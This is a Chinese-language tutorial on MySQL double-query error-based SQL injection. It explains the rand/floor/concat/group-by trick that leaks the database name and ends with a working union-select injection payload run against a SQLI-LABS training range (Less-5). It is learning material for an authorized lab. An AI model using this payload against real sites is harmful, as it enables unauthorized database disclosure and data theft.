MYSQL双查询错误1

一、基础知识　　

　　开始讲解MYSQL双查询错误之前，我们先了解一下双查询语句以及需要使用到的几个数据库函数和GROUP BY语句

　　1. 双查询语句

　　　　先了解一下什么是子查询，子查询就是嵌入第一层select语句中的select语句，比如：

SELECT * FROM score WHERE even_id IN (SELECT even_id FROM grade_event WHERE category = 'T');

功能：该语句实现的是找出与考试类别（'T'）相对应的所有考试事件行的ID，然后利用它们来查找那些考试的成绩

　　       双查询语句就是此类使用了两个select的查询语句

　　 2. 数据库函数和GROUP BY语句

　　　　1）rand() --- 随机数生成函数

　　　　2）floor() --- 向下取整函数

　　　　3）concat()  --- 字符串连接函数

　　　　4）count() --- 统计函数

　　　　5）group by --- 给出分组条件

二、环境搭建

（1）创建数据库
        create database injection;
（2）创建表
        create table user (
            id int,
            name varchar(15)
        );
（3）往表中插入3条数据
        insert into user value(1,'mike');
        insert into user value(2,'anna');
        insert into user value(3,'andy');

 数据库版本：mysql-5.7.27

三、查询操作

　　1. SQL语句

select count(*), concat((select database()), floor(rand()*2)) as a from user group by a;

　　2. 执行情况

　　3. 操作结果

　　　可以看到在第二次执行我们的SQL语句时发生了错误，从错误提示中我们获知了数据库的名字：injection.

四、靶场测试

　　下面我们利用SQLI-LABS这个SQL注入靶场做一次利用SQL双查询错误进行注入攻击，地址如下：

　　　　　　　　　　　　　　http://43.247.91.228:84/Less-5/

　　在上面的网址后加入：

?id=1‘ union select 1, count(*), concat((select database()), floor(rand()*2)) as a from information_schema.tables group by a --+

　　也许是运气好，第一次执行就得到了想要的结果，如下：

　　从上图中可以看出，我们已经得到了数据库的名字：security. 接下来可以一步一步构造要注入的SQL语句获取信息，在下

　　一篇讲解双查询错误原理后，会讲解如何构造注入语句来获取数据库信息.